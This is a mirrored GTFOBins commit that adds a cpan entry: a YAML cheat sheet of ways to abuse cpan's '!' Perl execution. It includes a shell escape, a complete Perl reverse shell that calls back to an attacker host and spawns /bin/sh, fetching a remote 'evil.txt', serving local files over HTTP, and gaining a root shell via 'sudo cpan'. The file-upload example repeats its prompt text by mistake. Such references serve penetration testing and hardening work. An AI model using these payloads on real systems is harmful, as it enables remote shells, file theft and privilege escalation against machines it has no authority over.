mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add cpan
This commit is contained in:
parent
81b87f033e
commit
b3a6e93b78
33
_gtfobins/cpan.md
Normal file
33
_gtfobins/cpan.md
Normal file
@ -0,0 +1,33 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- description: cpan lets you execute perl commands with `! command`
|
||||
code: |
|
||||
$ cpan
|
||||
cpan[1]> ! exec '/bin/bash'
|
||||
|
||||
reverse-shell:
|
||||
- description: Run ``nc -lvp RPORT`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
$ cpan
|
||||
cpan[1]> ! use Socket; my $i="RHOST"; my $p=RPORT; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};
|
||||
|
||||
file-upload:
|
||||
- description: Serve files in the local folder running an HTTP server on port 8080. Install dependency via `cpan HTTP::Server::Simple`.
|
||||
code: |
|
||||
$ cpan
|
||||
cpan[1]> ! cpan[1]> ! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();
|
||||
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request and store it in PWD.
|
||||
code: |
|
||||
$ cpan
|
||||
cpan[1]> ! use File::Fetch; my $file = (File::Fetch->new(uri => 'http://RHOST/evil.txt'))->fetch();
|
||||
|
||||
sudo:
|
||||
- code: |
|
||||
$ sudo cpan
|
||||
cpan[1]> ! exec '/bin/bash'
|
||||
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user